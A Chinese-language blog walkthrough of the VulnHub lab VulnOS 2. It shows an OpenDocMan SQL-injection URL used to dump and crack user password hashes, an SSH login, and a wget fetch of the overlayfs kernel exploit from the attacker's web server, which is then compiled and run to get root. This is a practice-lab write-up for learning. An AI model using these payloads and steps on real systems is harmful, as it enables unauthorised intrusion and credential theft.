0xo1 信息收集

┌──(kali㉿kali)-[~]
└─$ ifconfig            
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.18.177  netmask 255.255.255.0  broadcast 192.168.18.255
        inet6 fe80::bf14:b276:6eec:61fa  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:c7:69:7d  txqueuelen 1000  (Ethernet)
        RX packets 32  bytes 14219 (13.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36  bytes 11636 (11.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.18.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 06:28 EST
Nmap scan report for 192.168.18.1
Host is up (0.0069s latency).
Nmap scan report for 192.168.18.21
Host is up (0.010s latency).
Nmap scan report for 192.168.18.176
Host is up (0.0024s latency).
Nmap scan report for 192.168.18.177
Host is up (0.000069s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.49 seconds

掃描開啟port:

└─$ sudo nmap -sS -sV -A -p-  192.168.18.176
[sudo] password for nathan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 16:55 CST
Nmap scan report for 192.168.18.176
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: VulnOSv2
|_http-server-header: Apache/2.4.7 (Ubuntu)
6667/tcp open  irc     ngircd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/12%OT=22%CT=1%CU=42940%PV=Y%DS=2%DC=T%G=Y%TM=636F5F
OS:A2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST
OS:11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8380%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)

Network Distance: 2 hops
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   0.63 ms DESKTOP-NRNV04H.mshome.net (172.23.32.1)
2   2.24 ms 192.168.18.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.21 seconds
Segmentation fault

有開80port,先看網頁:

點下面的紫色超連結:

看到這網頁的思路: sql injection,或是強攻這個CMS框架,它的版本號如上圖紅框。先利用searchsploit找找看:

┌──(nathan㉿DESKTOP-NRNV04H)-[~/target_machine/VulnOSv2]
└─$ searchsploit  opendocman
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting                        | php/webapps/33295.txt
OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting                      | php/webapps/33298.txt
OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting                                | php/webapps/33299.txt
OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting                              | php/webapps/33300.txt
OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting                      | php/webapps/33297.txt
OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting                                 | php/webapps/33301.txt
OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting                                 | php/webapps/33302.txt
OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting                                  | php/webapps/33303.txt
OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities  | php/webapps/33296.txt
OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting                                    | php/webapps/33304.txt
OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting                               | php/webapps/33305.txt
OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection                               | php/webapps/9903.txt
OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)                     | php/webapps/20709.html
OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting                                  | php/webapps/25250.txt
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                           | php/webapps/32075.txt
OpenDocMan 1.3.4 - 'search.php where' SQL Injection                                   | php/webapps/46500.txt
OpenDocMan 1.3.4 - Cross-Site Request Forgery                                         | php/webapps/39414.txt
OpenDocMan 1.x - 'out.php' Cross-Site Scripting                                       | php/webapps/31933.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(nathan㉿DESKTOP-NRNV04H)-[~/target_machine/VulnOSv2]
└─$ searchsploit -m 32075
  Exploit: OpenDocMan 1.2.7 - Multiple Vulnerabilities
      URL: https://www.exploit-db.com/exploits/32075
     Path: /usr/share/exploitdb/exploits/php/webapps/32075.txt
File Type: Unicode text, UTF-8 text

Copied to: /home/nathan/target_machine/VulnOSv2/32075.txt

可以看到32075.txt是針對1.2.7這個版本。來看看裡面的內容:

└─$ cat 32075.txt
Advisory ID: HTB23202
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

------------------------------------------------------------------------
-----------------------

Solution:

Update to OpenDocMan v1.2.7.2

More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/

------------------------------------------------------------------------
-----------------------

References:

[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

------------------------------------------------------------------------
-----------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

可以看到,其實也是利用SQL injection。就照這txt所說的輸入網址:

http://192.168.18.176/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

就會出現下圖:

紅圈圈起來就是回顯點。

搞清楚回顯點後,就可以更改sql查詢語句,去查想要的資料,上圖查了使用者名稱,可以再查一查這一些使用者對應的密碼:

查一查下面兩個亂碼是什麼hash生成的:

└─$ hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: b78aae356709f8c31118ea613980954b

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

大概是MD5。在這個網站可以查到

b78aae356709f8c31118ea613980954b是webmin1980

這個網站可以查到

084e0343a0486ff05530df6c705c8bb4是guest。

0x02 Get Shell

就用webmin的帳號登入:

└─$ ssh webmin@192.168.18.176
The authenticity of host '192.168.18.176 (192.168.18.176)' can't be established.
ED25519 key fingerprint is SHA256:7FO0Y5C+W/hj0ShAjGy33uQvuMRPrSNk82jGy/wxnfY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.18.176' (ED25519) to the list of known hosts.
webmin@192.168.18.176's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Nov 12 05:56:47 CET 2022

  System load: 0.0               Memory usage: 2%   Processes:       63
  Usage of /:  5.7% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ echo os.system('/bin/bash')
-sh: 1: Syntax error: "(" unexpected
$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$

記得使用python -c 'import pty;pty.spawn("/bin/bash")'來穩定shell。

0x03 提權

查詢靶機使用的作業系統核心:

webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

尋找弱點:(攻擊機上)

└─$ searchsploit 3.13.0
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privi | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privi | linux/local/37293.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

找到這兩個,其實應該算同一個,一個是攻擊腳本的c原始碼,一個是漏洞介紹的txt,就都複製過來:

┌──(nathan㉿DESKTOP-NRNV04H)-[~/target_machine/VulnOSv2]
└─$ searchsploit -m 37292
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines (466)

Copied to: /home/nathan/target_machine/VulnOSv2/37292.c



┌──(nathan㉿DESKTOP-NRNV04H)-[~/target_machine/VulnOSv2]
└─$ searchsploit -m 37293
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)
      URL: https://www.exploit-db.com/exploits/37293
     Path: /usr/share/exploitdb/exploits/linux/local/37293.txt
File Type: ASCII text

Copied to: /home/nathan/target_machine/VulnOSv2/37293.txt

看了一下txt是本地提權,也就是這個攻擊腳本需在靶機上執行,但沒介紹攻擊腳本要怎麼用,總之先在攻擊機上建簡單web server:

└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.18.177 - - [13/Nov/2022 02:22:29] "GET / HTTP/1.1" 200 -
192.168.18.177 - - [13/Nov/2022 02:22:29] code 404, message File not found
192.168.18.177 - - [13/Nov/2022 02:22:29] "GET /favicon.ico HTTP/1.1" 404 -
192.168.18.176 - - [13/Nov/2022 02:22:48] "GET /37292.c HTTP/1.1" 200 -

再讓靶機下載下來:(以下在靶機的cmd下指令)

webmin@VulnOSv2:~$ wget http://192.168.18.177:8000/37292.c
--2022-11-12 22:00:17--  http://192.168.18.177:8000/37292.c
Connecting to 192.168.18.177:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[======================================>] 4,968       --.-K/s   in 0s

2022-11-12 22:00:17 (842 MB/s) - ‘37292.c’ saved [4968/4968]

webmin@VulnOSv2:~$ gcc 37292.c
webmin@VulnOSv2:~$ ls
37292.c  a.out  post.tar.gz  wget-log
webmin@VulnOSv2:~$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

成功提權後,就是找flag,不過還是得先穩定shell:

找flag:

# locate root
/root
/etc/alternatives/fakeroot
/etc/alternatives/fakeroot.1.gz
/etc/alternatives/fakeroot.es.1.gz
/etc/alternatives/fakeroot.fr.1.gz
/etc/alternatives/fakeroot.sv.1.gz
/etc/drupal/7/sites/all/modules/views/modules/book/views_plugin_argument_default_book_root.inc
/etc/init/checkroot-bootclean.sh.conf
/etc/init/checkroot.sh.conf
/etc/init.d/umountroot
/etc/ld.so.conf.d/fakeroot-i386-linux-gnu.conf
/etc/postgresql-common/root.crt
/etc/rc0.d/S60umountroot
/etc/rc6.d/S60umountroot
/etc/ssl/certs/Comodo_AAA_Services_root.pem
/etc/ssl/certs/Comodo_Secure_Services_root.pem
/etc/ssl/certs/Comodo_Trusted_Services_root.pem
/lib/i386-linux-gnu/security/pam_rootok.so
/lib/recovery-mode/options/root
/root/.bash_history
/root/.bashrc
/root/.cache
/root/.profile
/root/.psql_history
/root/.viminfo
/root/flag.txt
/root/.cache/motd.legal-displayed
/sbin/pivot_root
/sbin/switch_root
/usr/bin/fakeroot
/usr/bin/fakeroot-sysv
/usr/bin/fakeroot-tcp
/usr/bin/ischroot
/usr/lib/i386-linux-gnu/libfakeroot
/usr/lib/i386-linux-gnu/libfakeroot/libfakeroot-0.so
/usr/lib/i386-linux-gnu/libfakeroot/libfakeroot-sysv.so
/usr/lib/i386-linux-gnu/libfakeroot/libfakeroot-tcp.so
/usr/lib/i386-linux-gnu/samba/ldb/rootdse.so
/usr/lib/initramfs-tools/bin/wait-for-root
/usr/lib/klibc/bin/chroot
/usr/lib/klibc/bin/pivot_root
/usr/lib/python2.7/dist-packages/twisted/python/roots.py
/usr/lib/python2.7/dist-packages/twisted/python/roots.pyc
/usr/lib/python2.7/dist-packages/twisted/python/zsh/_websetroot
/usr/lib/python2.7/dist-packages/twisted/test/test_roots.py
/usr/lib/python2.7/dist-packages/twisted/test/test_roots.pyc
/usr/sbin/chroot
/usr/share/apport/root_info_wrapper
/usr/share/ca-certificates/mozilla/Comodo_AAA_Services_root.crt
/usr/share/ca-certificates/mozilla/Comodo_Secure_Services_root.crt
/usr/share/ca-certificates/mozilla/Comodo_Trusted_Services_root.crt
/usr/share/doc/fakeroot
/usr/share/doc/libfakeroot
/usr/share/doc/fakeroot/DEBUG
/usr/share/doc/fakeroot/README
/usr/share/doc/fakeroot/README.saving
/usr/share/doc/fakeroot/changelog.Debian.gz
/usr/share/doc/fakeroot/copyright
/usr/share/doc/libfakeroot/DEBUG
/usr/share/doc/libfakeroot/README
/usr/share/doc/libfakeroot/README.saving
/usr/share/doc/libfakeroot/changelog.Debian.gz
/usr/share/doc/libfakeroot/copyright
/usr/share/man/de/man1/fakeroot-sysv.1.gz
/usr/share/man/de/man1/fakeroot-tcp.1.gz
/usr/share/man/es/man1/fakeroot-sysv.1.gz
/usr/share/man/es/man1/fakeroot-tcp.1.gz
/usr/share/man/es/man1/fakeroot.1.gz
/usr/share/man/fr/man1/fakeroot-sysv.1.gz
/usr/share/man/fr/man1/fakeroot-tcp.1.gz
/usr/share/man/fr/man1/fakeroot.1.gz
/usr/share/man/man1/fakeroot-sysv.1.gz
/usr/share/man/man1/fakeroot-tcp.1.gz
/usr/share/man/man1/fakeroot.1.gz
/usr/share/man/man1/ischroot.1.gz
/usr/share/man/man2/chroot.2.gz
/usr/share/man/man2/pivot_root.2.gz
/usr/share/man/man8/chroot.8.gz
/usr/share/man/man8/pam_rootok.8.gz
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/sudo_root.8.gz
/usr/share/man/man8/switch_root.8.gz
/usr/share/man/nl/man1/fakeroot-sysv.1.gz
/usr/share/man/nl/man1/fakeroot-tcp.1.gz
/usr/share/man/sv/man1/fakeroot-sysv.1.gz
/usr/share/man/sv/man1/fakeroot-tcp.1.gz
/usr/share/man/sv/man1/fakeroot.1.gz
/usr/share/postgresql-common/t/130_nonroot_admin.t
/usr/share/postgresql-common/t/160_alternate_confroot.t
/usr/src/linux-headers-3.13.0-24/include/linux/root_dev.h
/usr/src/linux-headers-3.13.0-24-generic/include/config/eisa/virtual/root.h
/usr/src/linux-headers-3.13.0-24-generic/include/config/usb/ehci/root
/usr/src/linux-headers-3.13.0-24-generic/include/config/usb/ehci/root/hub
/usr/src/linux-headers-3.13.0-24-generic/include/config/usb/ehci/root/hub/tt.h
/usr/src/linux-headers-3.13.0-24-generic/include/linux/root_dev.h
/var/lib/dpkg/alternatives/fakeroot
/var/lib/dpkg/info/fakeroot.list
/var/lib/dpkg/info/fakeroot.md5sums
/var/lib/dpkg/info/fakeroot.postinst
/var/lib/dpkg/info/fakeroot.postrm
/var/lib/dpkg/info/fakeroot.prerm
/var/lib/dpkg/info/libfakeroot:i386.conffiles
/var/lib/dpkg/info/libfakeroot:i386.list
/var/lib/dpkg/info/libfakeroot:i386.md5sums
/var/log/fsck/checkroot

穩定shell,看看最可疑的文件:

# pwd
/home/webmin
# cd ..
# cd ..
# python -c 'import pty;pty.spawn("/bin/bash")'
root@VulnOSv2:/# pwd
/
root@VulnOSv2:/# ls
bin   dev  home        lib         media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lost+found  mnt    proc  run   srv   tmp  var
root@VulnOSv2:/# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Reference

Vulnhub-靶机-VULNOS: 2

No.14-VulnHub-VulnOS: 2-Walkthrough渗透学习

https://www.cmd5.com

https://www.somd5.com


#attack #Vulnhub #辨識hash類型 #OpenDocMan 1.2.7 #SQL Injection #md5解密 #從攻擊機下載







Related Posts

AI輔導室|爆裂風格文字

AI輔導室|爆裂風格文字

00. 前言

00. 前言

[進階 js 10] 物件導向 & Prototype

[進階 js 10] 物件導向 & Prototype


Comments